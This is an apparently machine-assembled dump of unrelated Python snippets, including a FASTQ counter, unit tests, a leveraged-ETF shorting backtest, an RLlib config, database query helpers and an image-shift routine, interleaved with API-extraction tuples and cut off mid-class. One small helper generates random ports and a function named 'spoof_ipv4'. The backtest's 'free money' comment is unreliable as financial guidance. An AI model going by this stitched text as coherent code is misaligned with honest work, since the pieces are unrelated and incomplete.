] | [((125, 159), 'problems.problem10.solution', 'solution', (['[4, 5, 6, 7, 0, 1, 2]', '(0)'], {}), '([4, 5, 6, 7, 0, 1, 2], 0)\n', (133, 159), False, 'from problems.problem10 import solution\n'), ((183, 217), 'problems.problem10.solution', 'solution', (['[4, 5, 6, 7, 0, 1, 2]', '(3)'], {}), '([4, 5, 6, 7, 0, 1, 2], 3)\n', (191, 217), False, 'from problems.problem10 import solution\n'), ((242, 261), 'problems.problem10.solution', 'solution', (['[3, 1]', '(1)'], {}), '([3, 1], 1)\n', (250, 261), False, 'from problems.problem10 import solution\n'), ((285, 304), 'problems.problem10.solution', 'solution', (['[3, 1]', '(3)'], {}), '([3, 1], 3)\n', (293, 304), False, 'from problems.problem10 import solution\n'), ((328, 350), 'problems.problem10.solution', 'solution', (['[1, 3, 5]', '(3)'], {}), '([1, 3, 5], 3)\n', (336, 350), False, 'from problems.problem10 import solution\n'), ((374, 396), 'problems.problem10.solution', 'solution', (['[3, 5, 1]', '(5)'], {}), '([3, 5, 1], 5)\n', (382, 396), False, 'from problems.problem10 import solution\n')] |
#!/usr/bin/env python
import subprocess
import argparse
import gzip
import json
from Bio import SeqIO
def main():
parser = argparse.ArgumentParser(description='Count the number of records in a read pair')
parser.add_argument('--R1', dest='r1', required=True)
parser.add_argument('--R2', dest='r2', required=True)
args = parser.parse_args()
fastq_record_count = 0
for rx in (args.r1, args.r2):
with open(rx) as infile:
fastq_record_count += sum(1 for record in SeqIO.parse(infile, 'fastq'))
with open('output.json', 'w') as outfile:
json.dump({'record_count': fastq_record_count}, outfile)
if __name__ == '__main__':
main()
| [
"json.dump",
"Bio.SeqIO.parse",
"argparse.ArgumentParser"
] | [((129, 215), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Count the number of records in a read pair"""'}), "(description=\n 'Count the number of records in a read pair')\n", (152, 215), False, 'import argparse\n'), ((592, 648), 'json.dump', 'json.dump', (["{'record_count': fastq_record_count}", 'outfile'], {}), "({'record_count': fastq_record_count}, outfile)\n", (601, 648), False, 'import json\n'), ((507, 535), 'Bio.SeqIO.parse', 'SeqIO.parse', (['infile', '"""fastq"""'], {}), "(infile, 'fastq')\n", (518, 535), False, 'from Bio import SeqIO\n')] |
import unittest
import fibonacci
class TestFibonacciMethods(unittest.TestCase):
def test_calc(self):
res = fibonacci.sequence_calc(10)
self.assertEqual(res, [0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
def test_check_true(self):
res = fibonacci.check_number(55)[0]
self.assertTrue(res)
def test_check_false(self):
res = fibonacci.check_number(67)[0]
self.assertFalse(res)
"""
other corner-case situations (For example, entering wrong expressions into arguments like string, negative integer and flout number) handles with the argparse python library.
"""
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"fibonacci.sequence_calc",
"fibonacci.check_number"
] | [((659, 674), 'unittest.main', 'unittest.main', ([], {}), '()\n', (672, 674), False, 'import unittest\n'), ((121, 148), 'fibonacci.sequence_calc', 'fibonacci.sequence_calc', (['(10)'], {}), '(10)\n', (144, 148), False, 'import fibonacci\n'), ((265, 291), 'fibonacci.check_number', 'fibonacci.check_number', (['(55)'], {}), '(55)\n', (287, 291), False, 'import fibonacci\n'), ((371, 397), 'fibonacci.check_number', 'fibonacci.check_number', (['(67)'], {}), '(67)\n', (393, 397), False, 'import fibonacci\n')] |
#model impact of shorting offseting leveraged daily etfs
#break even around short borrow rates 7-10%
import numpy as np
import pandas as pd
# import beautifulsoup4
import lxml.html
import requests
# import requests_cache
import re
import math
from datetime import datetime
import time
import random
from collections import namedtuple, Counter
import pickle
import os
import sys
import win32com.client
import matplotlib.pyplot as plt
github_dir = "c:\\Users\\student.DESKTOP-UT02KBN\\MSTG"
os.chdir(f"{github_dir}\\short_inverse")
#Note: Portfolios are not identical (long gets exposure w/ swaps & long nat gas)
long2x = pd.read_csv("UCO_hist.csv",
parse_dates=['Date'])
long2x.set_index("Date", inplace=True)
short2x = pd.read_csv("SCO_hist.csv",
parse_dates=['Date'])
short2x.set_index("Date", inplace=True)
#this varies a lot; need to improve
l_borrow_rate = pd.Series([0.0190 + 0.06]*len(long2x),
index = long2x.index)
#borrow rate till next price (so longer for weekends/holidays)
#last entry is 0; borrow rate for day 0 is cost to borrow till day 1
days = list((l_borrow_rate.index[:-1] - l_borrow_rate.index[1:]
)//np.timedelta64(1, 'D')) + [0]
#rate given is APR; a periodic rate. cost till next day
long2x['Borrow'] = [(1+r)**(d/365) -1 for r,d in zip(days, l_borrow_rate)]
s_borrow_rate = pd.Series([0.0334 + 0.06]*len(short2x),
index = short2x.index)
days = list((s_borrow_rate.index[:-1] - s_borrow_rate.index[1:]
)//np.timedelta64(1, 'D')) + [0]
short2x['Borrow'] = [(1+r)**(d/365) -1 for r,d in zip(days, s_borrow_rate)]
shale_start_date = datetime(year=2015, month=1, day=1)
neg_prices_date = datetime(year=2020, month=3, day=1)
long2x = long2x[(long2x.index >= shale_start_date) \
& (long2x.index <= neg_prices_date)]
short2x= short2x[(short2x.index >= shale_start_date) \
& (short2x.index <= neg_prices_date)]
long2x.columns = [f"L_{i}" for i in long2x.columns ]
short2x.columns = [f"S_{i}" for i in short2x.columns]
df = long2x.join(short2x, how='inner')
df = df.iloc[::-1]#earliest dates first
#%%
initial = 100000
cash = initial
leverage = 2#total market positions n* cash buffer
acnt_value = []
#no overnight position
for index, row in df.iterrows():
buffer = cash*leverage/2
l_pos = -buffer//row['L_Open']
s_pos = -buffer//row['S_Open']
# cash = (buffer % row['L_open']) + (buffer % row['S_open']) #what not invested initially
cash += l_pos *(row['L_Close'] - row['L_Open'])
cash += s_pos *(row['S_Close'] - row['S_Open'])
cash += row['L_Borrow'] * l_pos * row['L_Open'] \
+ row['S_Borrow'] * s_pos * row['S_Open']
if cash <= 0:
cash = 0
acnt_value += [cash]
acnt_value = pd.Series(acnt_value, index = df.index)
plt.plot(acnt_value, label="Close@ EOD")
plt.show()
print(acnt_value[-1]/initial, np.std(acnt_value.pct_change()))
cash = initial
acnt_value = []
#rebalance every morning: look at M2M and adjust size
l_pos, s_pos = 0,0
for index, row in df.iterrows():
m2m = cash + l_pos*row['L_Open'] + s_pos*row['S_Open']#marked 2 market portfolio
buffer = m2m*leverage/2
l_t = -buffer//row['L_Open']
s_t = -buffer//row['S_Open']
cash += (l_pos - l_t)*row['L_Open'] \
+ (s_pos - s_t)*row['S_Open']
l_pos, s_pos = l_t, s_t
cash += row['L_Borrow'] * l_pos * row['L_Open'] \
+ row['S_Borrow'] * s_pos * row['S_Open']
if cash <= 0:
cash = 0
# l_pos = 0
# s_pos = 0
acnt_value += [cash + l_pos*row['L_Close'] + s_pos*row['S_Close']]#evening m2m
acnt_value = pd.Series(acnt_value, index = df.index)
plt.plot(acnt_value, label = "Daily Morning Rebalance")
plt.legend()
plt.show()
print(acnt_value[-1]/initial, np.std(acnt_value.pct_change()))
#Seems like free money? | [
"datetime.datetime",
"pandas.Series",
"pandas.read_csv",
"matplotlib.pyplot.plot",
"os.chdir",
"numpy.timedelta64",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((492, 532), 'os.chdir', 'os.chdir', (['f"""{github_dir}\\\\short_inverse"""'], {}), "(f'{github_dir}\\\\short_inverse')\n", (500, 532), False, 'import os\n'), ((624, 673), 'pandas.read_csv', 'pd.read_csv', (['"""UCO_hist.csv"""'], {'parse_dates': "['Date']"}), "('UCO_hist.csv', parse_dates=['Date'])\n", (635, 673), True, 'import pandas as pd\n'), ((744, 793), 'pandas.read_csv', 'pd.read_csv', (['"""SCO_hist.csv"""'], {'parse_dates': "['Date']"}), "('SCO_hist.csv', parse_dates=['Date'])\n", (755, 793), True, 'import pandas as pd\n'), ((1681, 1716), 'datetime.datetime', 'datetime', ([], {'year': '(2015)', 'month': '(1)', 'day': '(1)'}), '(year=2015, month=1, day=1)\n', (1689, 1716), False, 'from datetime import datetime\n'), ((1735, 1770), 'datetime.datetime', 'datetime', ([], {'year': '(2020)', 'month': '(3)', 'day': '(1)'}), '(year=2020, month=3, day=1)\n', (1743, 1770), False, 'from datetime import datetime\n'), ((2815, 2852), 'pandas.Series', 'pd.Series', (['acnt_value'], {'index': 'df.index'}), '(acnt_value, index=df.index)\n', (2824, 2852), True, 'import pandas as pd\n'), ((2855, 2895), 'matplotlib.pyplot.plot', 'plt.plot', (['acnt_value'], {'label': '"""Close@ EOD"""'}), "(acnt_value, label='Close@ EOD')\n", (2863, 2895), True, 'import matplotlib.pyplot as plt\n'), ((2896, 2906), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2904, 2906), True, 'import matplotlib.pyplot as plt\n'), ((3678, 3715), 'pandas.Series', 'pd.Series', (['acnt_value'], {'index': 'df.index'}), '(acnt_value, index=df.index)\n', (3687, 3715), True, 'import pandas as pd\n'), ((3718, 3771), 'matplotlib.pyplot.plot', 'plt.plot', (['acnt_value'], {'label': '"""Daily Morning Rebalance"""'}), "(acnt_value, label='Daily Morning Rebalance')\n", (3726, 3771), True, 'import matplotlib.pyplot as plt\n'), ((3774, 3786), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3784, 3786), True, 'import matplotlib.pyplot as plt\n'), ((3787, 3797), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3795, 3797), True, 'import matplotlib.pyplot as plt\n'), ((1208, 1230), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (1222, 1230), True, 'import numpy as np\n'), ((1555, 1577), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (1569, 1577), True, 'import numpy as np\n')] |
from ray.rllib.agents.trainer import with_common_config
MADDPG_CONFIG = with_common_config({
# === MADDPG ===
"gamma": 0.95,
# Optimize over complete episodes by default.
"batch_mode": "complete_episodes",
# === Evaluation ===
# Evaluate with epsilon=0 every `evaluation_interval` training iterations.
# The evaluation stats will be reported under the "evaluation" metric key.
# Note that evaluation is currently not parallelized, and that for Ape-X
# metrics are already only reported for the lowest epsilon workers.
"evaluation_interval": None,
# Number of episodes to run per evaluation period.
"evaluation_num_episodes": 10,
# === Exploration ===
# Max num timesteps for annealing schedules. Exploration is annealed from
# 1.0 to exploration_fraction over this number of timesteps scaled by
# exploration_fraction
"schedule_max_timesteps": 100000,
# Number of env steps to optimize for before returning
"timesteps_per_iteration": 1000,
# Fraction of entire training period over which the exploration rate is
# annealed
"exploration_fraction": 0.1,
# Final value of random action probability
"exploration_final_eps": 0.1,
# Update the target network every `target_network_update_freq` steps.
"target_network_update_freq": 0,
# Update the target by \tau * policy + (1-\tau) * target_policy
"tau": 0.001,
# Target noise scale in target policy smoothing
"target_noise_scale": 0.2,
# === Replay buffer ===
# Size of the replay buffer
"buffer_size": 10000,
# === Optimization ===
# Learning rate for adam optimizer
"actor_lr": 0.001,
"critic_lr": 0.0003,
# If not None, clip gradients during optimization at this value
"grad_norm_clipping": 10,
# How many steps of the model to sample before learning starts.
"learning_starts": 1000,
# Update the replay buffer with this many samples at once. Note that
# this setting applies per-worker if num_workers > 1.0
"sample_batch_size": 1,
# Size of a batched sampled from replay buffer for training. Note that
# if async_updates is set, then each worker returns gradients for a
# batch of this size.
"train_batch_size": 32,
# === Parallelism ===
# Number of workers for collecting samples with. This only makes sense
# to increase if your environment is particularly slow to sample, or if
# you"re using the Async or Ape-X optimizers.
"num_workers": 0,
# Whether to use a distribution of epsilons across workers for exploration.
"per_worker_exploration": False,
# Whether to compute priorities on workers.
"worker_side_prioritization": False,
# Prevent iterations from going lower than this time span
"min_iter_time_s": 1,
# === Model ===
# Actor
"actor_model": {
"fcnet_activation": "relu",
"fcnet_hiddens": [64, 64],
},
# Critic
"critic_model": {
"fcnet_activation": "relu",
"fcnet_hiddens": [64, 64],
},
})
| [
"ray.rllib.agents.trainer.with_common_config"
] | [((75, 863), 'ray.rllib.agents.trainer.with_common_config', 'with_common_config', (["{'gamma': 0.95, 'batch_mode': 'complete_episodes', 'evaluation_interval':\n None, 'evaluation_num_episodes': 10, 'schedule_max_timesteps': 100000,\n 'timesteps_per_iteration': 1000, 'exploration_fraction': 0.1,\n 'exploration_final_eps': 0.1, 'target_network_update_freq': 0, 'tau': \n 0.001, 'target_noise_scale': 0.2, 'buffer_size': 10000, 'actor_lr': \n 0.001, 'critic_lr': 0.0003, 'grad_norm_clipping': 10, 'learning_starts':\n 1000, 'sample_batch_size': 1, 'train_batch_size': 32, 'num_workers': 0,\n 'per_worker_exploration': False, 'worker_side_prioritization': False,\n 'min_iter_time_s': 1, 'actor_model': {'fcnet_activation': 'relu',\n 'fcnet_hiddens': [64, 64]}, 'critic_model': {'fcnet_activation': 'relu',\n 'fcnet_hiddens': [64, 64]}}"], {}), "({'gamma': 0.95, 'batch_mode': 'complete_episodes',\n 'evaluation_interval': None, 'evaluation_num_episodes': 10,\n 'schedule_max_timesteps': 100000, 'timesteps_per_iteration': 1000,\n 'exploration_fraction': 0.1, 'exploration_final_eps': 0.1,\n 'target_network_update_freq': 0, 'tau': 0.001, 'target_noise_scale': \n 0.2, 'buffer_size': 10000, 'actor_lr': 0.001, 'critic_lr': 0.0003,\n 'grad_norm_clipping': 10, 'learning_starts': 1000, 'sample_batch_size':\n 1, 'train_batch_size': 32, 'num_workers': 0, 'per_worker_exploration': \n False, 'worker_side_prioritization': False, 'min_iter_time_s': 1,\n 'actor_model': {'fcnet_activation': 'relu', 'fcnet_hiddens': [64, 64]},\n 'critic_model': {'fcnet_activation': 'relu', 'fcnet_hiddens': [64, 64]}})\n", (93, 863), False, 'from ray.rllib.agents.trainer import with_common_config\n')] |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import logging
from collections import defaultdict
from indra.databases import hgnc_client
from indra.db import util as db_util
logger = logging.getLogger('db_client')
def get_reader_output(db, ref_id, ref_type='tcid', reader=None,
reader_version=None):
"""Return reader output for a given text content.
Parameters
----------
db : :py:class:`DatabaseManager`
Reference to the DB to query
ref_id : int or str
The text reference ID whose reader output should be returned
ref_type : Optional[str]
The type of ID to look for, options include
'tcid' for the database's internal unique text content ID,
or 'pmid', 'pmcid', 'doi, 'pii', 'manuscript_id'
Default: 'tcid'
reader : Optional[str]
The name of the reader whose output is of interest
reader_version : Optional[str]
The specific version of the reader
Returns
-------
reading_results : dict{dict{list[str]}}
A dict of reader outputs that match the query criteria, indexed first
by text content id, then by reader.
"""
if ref_type == 'tcid':
clauses = [db.Readings.text_content_id == ref_id]
else:
trids = _get_trids(db, ref_id, ref_type)
if not trids:
return []
logger.debug("Found %d text ref ids." % len(trids))
clauses = [db.TextContent.text_ref_id.in_(trids),
db.Readings.text_content_id == db.TextContent.id]
if reader:
clauses.append(db.Readings.reader == reader.upper())
if reader_version:
clauses.append(db.Readings.reader_version == reader_version)
res = db.select_all([db.Readings.text_content_id, db.Readings.reader,
db.Readings.bytes], *clauses)
reading_dict = defaultdict(lambda: defaultdict(lambda: []))
for tcid, reader, result in res:
reading_dict[tcid][reader].append(db_util.unpack(result))
return reading_dict
def get_content_by_refs(db, pmid_list=None, trid_list=None, sources=None,
formats=None, content_type='abstract', unzip=True):
"""Return content from the database given a list of PMIDs or text ref ids.
Note that either pmid_list OR trid_list must be set, and only one can be
set at a time.
Parameters
----------
db : :py:class:`DatabaseManager`
Reference to the DB to query
pmid_list : list[str] or None
A list of pmids. Default is None, in which case trid_list must be given.
trid_list : list[int] or None
A list of text ref ids. Default is None, in which case pmid list must be
given.
sources : list[str] or None
A list of sources to include (e.g. 'pmc_oa', or 'pubmed'). Default is
None, indicating that all sources will be included.
formats : list[str]
A list of the formats to be included ('xml', 'text'). Default is None,
indicating that all formats will be included.
content_type : str
Select the type of content to load ('abstract' or 'fulltext'). Note that
not all refs will have any, or both, types of content.
unzip : Optional[bool]
If True, the compressed output is decompressed into clear text.
Default: True
Returns
-------
content_dict : dict
A dictionary whose keys are text ref ids, with each value being the
the corresponding content.
"""
# Make sure we only get one type of list.
if not pmid_list or trid_list:
raise ValueError("One of `pmid_list` or `trid_list` must be defined.")
if pmid_list and trid_list:
raise ValueError("Only one of `pmid_list` or `trid_list` may be used.")
# Put together the clauses for the general constraints.
clauses = []
if sources is not None:
clauses.append(db.TextContent.source.in_(sources))
if formats is not None:
clauses.append(db.TextContent.format.in_(formats))
if content_type not in ['abstract', 'fulltext']:
raise ValueError("Unrecognized content type: %s" % content_type)
else:
clauses.append(db.TextContent.text_type == content_type)
# Do the query to get the content.
if pmid_list is not None:
content_list = db.select_all([db.TextRef.pmid, db.TextContent.content],
db.TextRef.id == db.TextContent.text_ref_id,
db.TextRef.pmid.in_(pmid_list),
*clauses)
else:
content_list = db.select_all([db.TextRef.id, db.TextContent.content],
db.TextContent.text_ref_id.in_(trid_list),
*clauses)
if unzip:
content_dict = {id_val: db_util.unpack(content)
for id_val, content in content_list}
else:
content_dict = {id_val: content for id_val, content in content_list}
return content_dict
#==============================================================================
# Below are some functions that are useful for getting raw statements from the
# database at various levels of abstraction.
#==============================================================================
def get_statements_by_gene_role_type(agent_id=None, agent_ns='HGNC-SYMBOL',
role=None, stmt_type=None, count=1000,
db=None, do_stmt_count=True,
preassembled=True):
"""Get statements from the DB by stmt type, agent, and/or agent role.
Parameters
----------
agent_id : str
String representing the identifier of the agent from the given
namespace. Note: if the agent namespace argument, `agent_ns`, is set
to 'HGNC-SYMBOL', this function will treat `agent_id` as an HGNC gene
symbol and perform an internal lookup of the corresponding HGNC ID.
Default is 'HGNC-SYMBOL'.
agent_ns : str
Namespace for the identifier given in `agent_id`.
role : str
String corresponding to the role of the agent in the statement.
Options are 'SUBJECT', 'OBJECT', or 'OTHER' (in the case of `Complex`,
`SelfModification`, and `ActiveForm` Statements).
stmt_type : str
Name of the Statement class.
count : int
Number of statements to retrieve in each batch (passed to
:py:func:`get_statements`).
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local databse instance.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
preassembled : bool
If true, statements will be selected from the table of pre-assembled
statements. Otherwise, they will be selected from the raw statements.
Default is True.
Returns
-------
list of Statements from the database corresponding to the query.
"""
if db is None:
db = db_util.get_primary_db()
if preassembled:
Statements = db.PAStatements
Agents = db.PAAgents
else:
Statements = db.Statements
Agents = db.Agents
if not (agent_id or role or stmt_type):
raise ValueError('At least one of agent_id, role, or stmt_type '
'must be specified.')
clauses = []
if agent_id and agent_ns == 'HGNC-SYMBOL':
hgnc_id = hgnc_client.get_hgnc_id(agent_id)
if not hgnc_id:
logger.warning('Invalid gene name: %s' % agent_id)
return []
clauses.extend([Agents.db_name.like('HGNC'),
Agents.db_id.like(hgnc_id)])
elif agent_id:
clauses.extend([Agents.db_name.like(agent_ns),
Agents.db_id.like(agent_id)])
if role:
clauses.append(Agents.role == role)
if agent_id or role:
clauses.append(Agents.stmt_id == Statements.id)
if stmt_type:
clauses.append(Statements.type == stmt_type)
stmts = get_statements(clauses, count=count, do_stmt_count=do_stmt_count,
db=db, preassembled=preassembled)
return stmts
def get_statements_by_paper(id_val, id_type='pmid', count=1000, db=None,
do_stmt_count=True):
"""Get the statements from a particular paper.
Note: currently this can only retrieve raw statements, because of the
partially implemented configuration of the pre-assembled Statement table.
Parameters
----------
id_val : int or str
The value of the id for the paper whose statements you wish to retrieve.
id_type : str
The type of id used (default is pmid). Options include pmid, pmcid, doi,
pii, url, or manuscript_id. Note that pmid is generally the best means
of getting a paper.
count : int
Number of statements to retrieve in each batch (passed to
:py:func:`get_statements`).
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local databse instance.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
Returns
-------
A list of Statements from the database corresponding to the paper id given.
"""
if db is None:
db = db_util.get_primary_db()
trid_list = _get_trids(db, id_val, id_type)
if not trid_list:
return None
stmts = []
for trid in trid_list:
clauses = [
db.TextContent.text_ref_id == trid,
db.Readings.text_content_id == db.TextContent.id,
db.Statements.reader_ref == db.Readings.id
]
stmts.extend(get_statements(clauses, count=count, preassembled=False,
do_stmt_count=do_stmt_count, db=db))
return stmts
def get_statements(clauses, count=1000, do_stmt_count=True, db=None,
preassembled=True):
"""Select statements according to a given set of clauses.
Parameters
----------
clauses : list
list of sqlalchemy WHERE clauses to pass to the filter query.
count : int
Number of statements to retrieve and process in each batch.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local database instance.
preassembled : bool
If true, statements will be selected from the table of pre-assembled
statements. Otherwise, they will be selected from the raw statements.
Default is True.
Returns
-------
list of Statements from the database corresponding to the query.
"""
if db is None:
db = db_util.get_primary_db()
stmts_tblname = 'pa_statements' if preassembled else 'statements'
stmts = []
q = db.filter_query(stmts_tblname, *clauses)
if do_stmt_count:
logger.info("Counting statements...")
num_stmts = q.count()
logger.info("Total of %d statements" % num_stmts)
db_stmts = q.yield_per(count)
subset = []
total_counter = 0
for stmt in db_stmts:
subset.append(stmt)
if len(subset) == count:
stmts.extend(db_util.make_stmts_from_db_list(subset))
subset = []
total_counter += 1
if total_counter % count == 0:
if do_stmt_count:
logger.info("%d of %d statements" % (total_counter, num_stmts))
else:
logger.info("%d statements" % total_counter)
stmts.extend(db_util.make_stmts_from_db_list(subset))
return stmts
def _get_trids(db, id_val, id_type):
"""Return text ref IDs corresponding to any ID type and value."""
# Get the text ref id(s)
if id_type in ['trid']:
trid_list = [int(id_val)]
else:
id_types = ['pmid', 'pmcid', 'doi', 'pii', 'url', 'manuscript_id']
if id_type not in id_types:
raise ValueError('id_type must be one of: %s' % str(id_types))
constraint = (getattr(db.TextRef, id_type) == id_val)
trid_list = [trid for trid, in db.select_all(db.TextRef.id, constraint)]
return trid_list
| [
"logging.getLogger",
"indra.db.util.unpack",
"indra.databases.hgnc_client.get_hgnc_id",
"indra.db.util.make_stmts_from_db_list",
"builtins.str",
"collections.defaultdict",
"indra.db.util.get_primary_db"
] | [((244, 274), 'logging.getLogger', 'logging.getLogger', (['"""db_client"""'], {}), "('db_client')\n", (261, 274), False, 'import logging\n'), ((7251, 7275), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (7273, 7275), True, 'from indra.db import util as db_util\n'), ((7683, 7716), 'indra.databases.hgnc_client.get_hgnc_id', 'hgnc_client.get_hgnc_id', (['agent_id'], {}), '(agent_id)\n', (7706, 7716), False, 'from indra.databases import hgnc_client\n'), ((9689, 9713), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (9711, 9713), True, 'from indra.db import util as db_util\n'), ((11257, 11281), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (11279, 11281), True, 'from indra.db import util as db_util\n'), ((12096, 12135), 'indra.db.util.make_stmts_from_db_list', 'db_util.make_stmts_from_db_list', (['subset'], {}), '(subset)\n', (12127, 12135), True, 'from indra.db import util as db_util\n'), ((1941, 1965), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (1952, 1965), False, 'from collections import defaultdict\n'), ((2045, 2067), 'indra.db.util.unpack', 'db_util.unpack', (['result'], {}), '(result)\n', (2059, 2067), True, 'from indra.db import util as db_util\n'), ((4888, 4911), 'indra.db.util.unpack', 'db_util.unpack', (['content'], {}), '(content)\n', (4902, 4911), True, 'from indra.db import util as db_util\n'), ((11758, 11797), 'indra.db.util.make_stmts_from_db_list', 'db_util.make_stmts_from_db_list', (['subset'], {}), '(subset)\n', (11789, 11797), True, 'from indra.db import util as db_util\n'), ((12535, 12548), 'builtins.str', 'str', (['id_types'], {}), '(id_types)\n', (12538, 12548), False, 'from builtins import dict, str\n')] |
import random
#return a random port
def randomize_port():
return random.randint(0,65535)
def random_seq():
return random.randint(1000,9000)
def spoof_ipv4():
ipv4 = list()
#initial 3 bits
ipv4.append(random.randint(0,128))
for i in range(3):
ipv4.append(random.randint(0,128))
addr = str(ipv4[0])+ "." + str(ipv4[1]) + "." + str(ipv4[2]) + "." + str(ipv4[3])
return addr
#for i in range(100):
# print(spoof_ipv4()) | [
"random.randint"
] | [((67, 91), 'random.randint', 'random.randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (81, 91), False, 'import random\n'), ((117, 143), 'random.randint', 'random.randint', (['(1000)', '(9000)'], {}), '(1000, 9000)\n', (131, 143), False, 'import random\n'), ((206, 228), 'random.randint', 'random.randint', (['(0)', '(128)'], {}), '(0, 128)\n', (220, 228), False, 'import random\n'), ((263, 285), 'random.randint', 'random.randint', (['(0)', '(128)'], {}), '(0, 128)\n', (277, 285), False, 'import random\n')] |
'''
test shift_img function based on different rng
'''
import numpy as np
rng = 4
if rng == 1:
img = np.array([[11,12,13],
[18,00,14],
[17,16,15]])
elif rng ==2:
img = np.array([[11,12,13,14,15],
[26,00,00,00,16],
[25,00,00,00,17],
[24,00,00,00,18],
[23,22,21,20,19]])
elif rng ==3:
img = np.array([[11,12,13,14,15,16,17],
[34,00,00,00,00,00,18],
[33,00,00,00,00,00,19],
[32,00,00,00,00,00,20],
[31,00,00,00,00,00,21],
[30,00,00,00,00,00,22],
[29,28,27,26,25,24,23]])
elif rng ==4:
img = np.array([[11,12,13,14,15,16,17,18,19],
[42,00,00,00,00,00,00,00,20],
[41,00,00,00,00,00,00,00,21],
[40,00,00,00,00,00,00,00,22],
[39,00,00,00,00,00,00,00,23],
[38,00,00,00,00,00,00,00,24],
[37,00,00,00,00,00,00,00,25],
[36,00,00,00,00,00,00,00,26],
[35,34,33,32,31,30,29,28,27]])
def shift_img(img,rng):
'''
shift image based on the rng directions
'''
minimum_input_size = (rng*2)+1 # minimum input size based on rng
output_size_y = img.shape[0] - (rng*2) # expected output size after shifting
output_size_x = img.shape[1] - (rng*2) # expected output size after shifting
total_shift_direction = rng*8 # total shifting direction based on rng
# initialization
img_shift_ = []
x = -rng
y = -rng
# get shifted images if output size >0
if output_size_y>0 and output_size_x>0:
for i in range(total_shift_direction):
# get images in shifted direction
if (x<=0 and y<=0) :
if y == -rng:
img_shift = img[:y*2, rng+x:(x*2)-(rng+x)]
elif x == -rng:
img_shift = img[rng+y:(y*2)-(rng+y),:x*2]
elif x>0 and y<=0:
if x == rng:
img_shift = img[rng+y:(y*2)-(rng+y), rng+x:]
else:
img_shift = img[rng+y:(y*2)-(rng+y), rng+x:x-rng]
elif x<=0 and y>0:
if y == rng:
img_shift = img[rng+y:, rng+x:(x*2)-(rng+x)]
else:
img_shift = img[rng+y:y-rng, rng+x:(x*2)-(rng+x)]
elif x>0 and y>0:
if x == rng and y == rng:
img_shift = img[rng+y:, rng+x:]
elif x == rng:
img_shift = img[rng+y:y-rng, rng+x:]
elif y == rng:
img_shift = img[rng+y:, rng+x:x-rng]
# update x and y shifting value
if x == -rng and y>-rng:
y-=1
elif x < rng and y < rng:
x+=1
elif x >= rng and y < rng:
y+=1
elif y >= rng and x >-rng:
x-=1
img_shift_.append(img_shift)
return img_shift_
img_shift_ = shift_img(img,rng)
print(img_shift_)
| [
"numpy.array"
] | [((108, 159), 'numpy.array', 'np.array', (['[[11, 12, 13], [18, 0, 14], [17, 16, 15]]'], {}), '([[11, 12, 13], [18, 0, 14], [17, 16, 15]])\n', (116, 159), True, 'import numpy as np\n'), ((221, 337), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15], [26, 0, 0, 0, 16], [25, 0, 0, 0, 17], [24, 0, 0, 0, \n 18], [23, 22, 21, 20, 19]]'], {}), '([[11, 12, 13, 14, 15], [26, 0, 0, 0, 16], [25, 0, 0, 0, 17], [24, \n 0, 0, 0, 18], [23, 22, 21, 20, 19]])\n', (229, 337), True, 'import numpy as np\n'), ((439, 642), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15, 16, 17], [34, 0, 0, 0, 0, 0, 18], [33, 0, 0, 0, 0, 0,\n 19], [32, 0, 0, 0, 0, 0, 20], [31, 0, 0, 0, 0, 0, 21], [30, 0, 0, 0, 0,\n 0, 22], [29, 28, 27, 26, 25, 24, 23]]'], {}), '([[11, 12, 13, 14, 15, 16, 17], [34, 0, 0, 0, 0, 0, 18], [33, 0, 0,\n 0, 0, 0, 19], [32, 0, 0, 0, 0, 0, 20], [31, 0, 0, 0, 0, 0, 21], [30, 0,\n 0, 0, 0, 0, 22], [29, 28, 27, 26, 25, 24, 23]])\n', (447, 642), True, 'import numpy as np\n'), ((776, 1097), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15, 16, 17, 18, 19], [42, 0, 0, 0, 0, 0, 0, 0, 20], [41, \n 0, 0, 0, 0, 0, 0, 0, 21], [40, 0, 0, 0, 0, 0, 0, 0, 22], [39, 0, 0, 0, \n 0, 0, 0, 0, 23], [38, 0, 0, 0, 0, 0, 0, 0, 24], [37, 0, 0, 0, 0, 0, 0, \n 0, 25], [36, 0, 0, 0, 0, 0, 0, 0, 26], [35, 34, 33, 32, 31, 30, 29, 28, 27]\n ]'], {}), '([[11, 12, 13, 14, 15, 16, 17, 18, 19], [42, 0, 0, 0, 0, 0, 0, 0, \n 20], [41, 0, 0, 0, 0, 0, 0, 0, 21], [40, 0, 0, 0, 0, 0, 0, 0, 22], [39,\n 0, 0, 0, 0, 0, 0, 0, 23], [38, 0, 0, 0, 0, 0, 0, 0, 24], [37, 0, 0, 0, \n 0, 0, 0, 0, 25], [36, 0, 0, 0, 0, 0, 0, 0, 26], [35, 34, 33, 32, 31, 30,\n 29, 28, 27]])\n', (784, 1097), True, 'import numpy as np\n')] |
from dragonphy import *
import numpy as np
import matplotlib.pyplot as plt
class FFEHelper:
